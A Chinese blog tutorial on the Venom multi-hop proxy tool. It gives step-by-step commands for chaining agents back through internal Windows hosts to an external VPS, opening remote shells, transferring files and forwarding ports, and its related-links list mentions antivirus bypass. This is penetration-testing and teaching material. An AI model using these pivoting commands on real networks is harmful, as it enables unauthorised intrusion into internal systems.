内网穿透工具---Venom使用教程

最新推荐文章于 2024-06-28 13:19:57 发布
最新推荐文章于 2024-06-28 13:19:57 发布
阅读量1.3w 收藏 36
点赞数 12
分类专栏: 内网渗透 安全 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u011215939/article/details/103403545
版权
安全 同时被 3 个专栏收录
33 篇文章 4 订阅
订阅专栏
服务器
7 篇文章 2 订阅
订阅专栏
内网渗透
3 篇文章 2 订阅
订阅专栏

介绍

从某个做内网工作的朋友口里面听到这个工具:Venom;这是一款为渗透测试人员设计的使用Go开发的多级代理工具。Venom可将多个节点进行连接,然后以节点为跳板,构建多级代理。渗透测试人员可以使用Venom轻松地将网络流量代理到多层内网,并轻松地管理代理节点。这个工具在github上面链接;流弊呀~~~确实是很流弊的
这个工具直接下载编译好的比较方便啦;目录结构:
在这里插入图片描述
admin
在这里插入图片描述
agent
在这里插入图片描述
admin节点和agent节点均可监听连接也可发起连接

  1. admin监听端口,agent发起连接:
    admin.exe -lport 9999
    agent.exe -rhost 192.168.0.103 -rport 9999
  2. agent监听端口,admin发起连接:
    agent.exe -lport 8888
    admin.exe -rhost 192.168.204.139 -rport 8888

准备

1、外网的vps,Ubuntu:120.10.120.X(反正就是一个外网的IP)
2、内网的机器三台windowsIP地址192.168.3.160、192.168.3.15、192.168.3.30
3、设想外网的VPS要访问最里面的3.160只能一层一层的依次访问;3.160只能和3.30相互访问;3.30可以和3.15,3.160访问而不能访问外网的VPS;最后3.15能被外网VPS访问,也能和3.30相互访问;这时我们就是用神器Venom来进行一层一层的代理;(大家都知道同一个局域网的都可以相互访问,但是这只是设想了一个场景便于理解使用)
在这里插入图片描述

步骤

1、现将下载好的Venom工具依次上传到对应的机器里面,使用对应的执行文件进行运行,先在外网的VPS上面上传好工具包,解压并对对应的执行文件进行修改权限 chmod 777 admin_linux_x64;刚刚解压的时候都不能执行。
在这里插入图片描述
2、我这里使用./admin_linux_x64来进行监听本地端口操作,并让内网的机器连接外网的机器,内网的机器就是用agent.exe文件来进行连接操作吧。执行命令./admin_linux_x64 -lport 4343,监听本地4343端口。
在这里插入图片描述
3、这里所有机器都已经上传了Venom工具包并解压,环境都是windows的;接下来在192.168.3.15机器上面执行连接操作;执行命令agent.exe -rhost 120.10.120.X -rport 4343 ;
在这里插入图片描述
很快外网的VPS也监听成功了,获取了;
在这里插入图片描述
4、然后来在外网的VPS上进行操作;help,这里我们要使用到show,goto,listen,exit,shell这几个命令;先来看看怎么使用,余下的命令自己都可以摸索出来的;
在这里插入图片描述
这里执行show命令,可以看见刚刚进行连接的一个节点;
在这里插入图片描述
好勒,再来试试goto命令 这样可以切换到1节点上面去;
在这里插入图片描述
嘿,还是很简单的,接下里看看是否真的切换到192.168.3.15机器上面了,执行shell;就是192.168.3.15;这说明成功了;
在这里插入图片描述
5、接下来exit退出,进行下一步的监听操作;在不退出1节点的基础上面执行listen 4343端口进行监听;192.168.3.15机器上面已经监听成功了;
在这里插入图片描述
6、接着在192.168.3.30机器上面执行连接操作,执行命令:agent.exe -rhost 192.168.
3.15 -rport 4343,执行成功了;
在这里插入图片描述
再回到VPS上面进行查看一下,执行show命令,是否新增了一个节点;新增了一个节点;Venom工具在执行过程中尽量不要将命令写错,这个没有办法删除错误的命令 ;只能enter了
在这里插入图片描述
切换到节点2中;执行命令:goto 2;切换成功了后ipconfig查看IP,192.168.3.30这就是了,没有问题了;
在这里插入图片描述
7、现在进行最后一台机器;依次执行命令exit,listen 4343 ;192.168.3.30机器上面已经监听成功了
在这里插入图片描述
8、最后在192.168.3.160机器上面进行连接操作,执行命令:agent.exe -rhost 192.168.3.30 -rport 4343
在这里插入图片描述
9、最后回到VPS上面执行show查看一下成功没有;
在这里插入图片描述
依次执行命令:goto 3切换到3节点,shell,ipconfig,whoami;可以看到最后成功连接了3.160机器,这个过程就成功了
在这里插入图片描述
最后以上监听的端口在节点上面进行listen的时候可以不一致,一台机器上也可以监听多个端口,比如,内网2中有一台机器192.168.3.31,可以和3.30相互访问;
在这里插入图片描述
在节点2基础上面执行3.30本地监听;listen 11111 这里就是不是4343端口了,一样的可以监听成功。
在这里插入图片描述
在192.168.3.31上面执行命令:agent.exe -rhost 192.168.3.30 -rport 11111
在这里插入图片描述
再回到VPS上面执行show,可以看到新增一个节点4,这个就是192.168.3.31的机器了。
在这里插入图片描述
在这里插入图片描述
还可以本地文件上传于下载;
上传一直图片试试;upload 2018.jpg C:\2018.jpg 将本地的文件上传到节点1的C盘根目录下面
在这里插入图片描述
下载文件download C:\1.gif 1.gif 将节点1中的文件下载到本地
在这里插入图片描述

lforward/rforward 将本地端口转发到远程/将远程端口转发到本地
lforward将admin节点本地的8888端口转发到node1的8888端口
lforward 127.0.0.1 8888 8888

rforward 将node1网段的192.168.204.103端口8889转发到admin节点本地的8889端口
rforward 192.168.3.15 8088 8889
在这里插入图片描述
在这里插入图片描述
最后更多的命令之类的可以访问链接1链接2

猫星人不会笑
关注
  • 12
    点赞
  • 36
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
代理内网穿透-Lcx.exe-venom-proxychains
代码审计
04-24 7314
代理面试常问一.概述代理的本质是socks协议
睿思麟阁红队攻防分享会| 内网穿透思路整理与工具使用
heitu0的博客
10-12 1264
睿思麟阁红队攻防分享会第五期, 内网穿透思路整理与工具使用
如何在kali虚拟机中下载内网穿透工具venom
qq_73393033的博客
10-13 531
这样venom的压缩文件就被下载到了/home/kali文件夹中了。
Venom工具使用
weixin_44508748的博客
05-23 4337
前提:已经拿到某服务器shell,可以上传文件且具有执行权限; 项目地址(编译后):https://github.com/Dliv3/Venom/releases 一、进入内网 1.上传admin_linux_x64到vps端,运行并监听本地11111端口: chmod 777 admin_linux_x64 ./ admin_linux_x64 -lport 11111 2.利用已经拿到的的shell上传agent_linux_x64文件到目标服务器,并执行 chmod 777 agent_linu
【渗透工具】内网多级代理工具Venom详细使用教程
最新发布
TT小子的博客
06-28 1444
Venom是一款为渗透测试人员设计的使用Go开发的多级代理工具Venom可将多个节点进行连接,然后以节点为跳板,构建多级代理。渗透测试人员可以使用Venom轻松地将网络流量代理到多层内网,并轻松地管理代理节点。
Venom代理工具使用--以三层代理为例
y920312的专栏
03-30 1228
利用虚拟机模拟多层网络,以多层代理渗透为例,描述代理工具Venom使用测试过程,帮助渗透测试人员使用Venom工具轻松地将网络流量代理到多层内网,并管理代理节点。
内网穿透工具-venom
mingyqf的博客
12-12 2049
Venom - A Multi-hop Proxy for Penetration Testers 简体中文 | English https://github.com/Dliv3/Venom Venom是一款为渗透测试人员设计的使用Go开发的多级代理工具Venom可将多个节点进行连接,然后以节点为跳板,构建多级代理。 渗透测试人员可以使用Venom轻松地将网络流量代理到多层内网,并轻松地管理代理节点。 此工具仅限于安全研究和教学,用户承担因使用工具而导致的所有法律和相关责任! 作者不承担任何法律和相
Venom的简单使用
andiao1218的博客
09-21 801
工具地址:https://github.com/r00t-3xp10it/venom 打开到venom目录,输入./venom.sh 打开程序 按回车键继续 这里有很多的模块,要用哪个模块就输入它的编号,这里测试第11个,输入11回车后,会有一个填IP的弹窗,根据自己的填写 之后会弹出一个填写端口的弹窗,我直接填写666 然后就是命名 设置paylo...
毒液:一种轻量级的工具,可简化流程终止情况的测试
02-03
"毒液"(Venom)是一个专门为Android设计的轻量级工具,旨在简化流程终止(process-death)情况的测试。流程终止是指Android系统为了回收资源或应对内存不足的情况,可能会杀死正在后台运行的应用进程。这种情况下,...
kali总结——基本工具
haoaaao的博客
04-02 8359
一、netcat 1、 功能: 监听模式/传输模式、telnet/获取banner信息、传输文本信息、传输文件/目录、加密传输文件、传承控制/木马、加密所有流量、流媒体服务器、远程克隆硬盘 2、nc-telnet/banner 可作为客户端使用、也可作为服务器端使用 (1)nc -vn v显示详细连接信息,n后面跟一个ip。由于直接进行域名解析比较慢,所以通常先把域名对应的ip解析出来,然后用nc连ip,就可以查看到服务器的banner信息. ...
vulnhub_内网渗透测试的记录——网络安全
tenyuanruby的博客
12-21 180
这个靶机花了我大半天的时间,主要还是在网络配置上面的捯饬,内网的靶机每一个都不太难,重要的就是如何通过流量转发后正确的使用一些工具达到扫描端口爆破服务的目的,总体的收获还是挺大的,虽然和真实环境相比确实差别较大,但刚好最近就在用ES这方面的产品,也趁着这个机会对于ES的相关漏洞也加强了学习。
Venom 内网穿透
weixin_44617541的博客
04-17 4382
Venom 内网穿透
使用Venom绕过AV控制目标
自学编程_youkewang.top
12-18 1175
S1:使用git下载Venom免杀工具,地址为:https://github.com/Pitcoft/venom.git                                                                                         图1-1. S2:运行venom.sh脚本.              
内网渗透系列:内网隧道之Venom
闵行小鱼塘
04-09 1387
本文研究端口转发&SOCKS5&SSH的一个工具Venom
venom结合Metasploit绕过360安全卫士
andyshen1995的博客
01-20 550
原理:msfvenom是msfpayload和msfencode的结合体,利用msfvenom生成shellcode,venom生成工具使用了 一些Veil-Evasion.py, unicorn.py, powersploit.py等工具上的技术。但是venom 是基于 bash 编写的,而不是 基于 Python。相比veil evasion在payload格式...
Venom靶机渗透记录
althumi的博客
12-20 364
【代码】Venom靶机渗透记录。
探索 Venom:一款强大的自动化渗透测试框架
gitblog_00081的博客
03-24 332
探索 Venom:一款强大的自动化渗透测试框架 VenomVenom - A Multi-hop Proxy for Penetration Testers项目地址:https://gitcode.com/gh_mirrors/ven/Venom 是一个由 Dliv3 开发的开源项目,它是一个高度模块化的自动化渗透测试框架,旨在简化和加速安全研究人员及红队操作的安全评估过程。在这个快速发展的数字...
python编写一个函数,查询这个单词解释
03-21
可以使用 Python 的 requests 和 BeautifulSoup 库来实现这个功能。以下是一个简单的示例代码: ```python import requests from bs4 import BeautifulSoup def query_word(word): url = f'https://www.dictionary.com/browse/{word}' response = requests.get(url) soup = BeautifulSoup(response.content, 'html.parser') definition = soup.find('span', {'class': 'one-click-content'}).text.strip() return definition ``` 这个函数接受一个单词作为参数,然后使用 requests 库发送一个 GET 请求到 dictionary.com 上查询该单词的解释。然后使用 BeautifulSoup 库解析 HTML 页面,找到包含解释的元素,并返回解释的文本。 例如,如果你调用 `query_word('python')`,它会返回: ``` noun a large, nonvenomous snake of the boa family, found in Africa, Asia, and Australia, that kills its prey by constriction and has well-developed, rear-fanged teeth to introduce venom. ``` 请注意,这个函数只能查询英文单词的解释,如果你需要查询中文单词的解释,需要使用中文词典网站,并相应地修改代码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值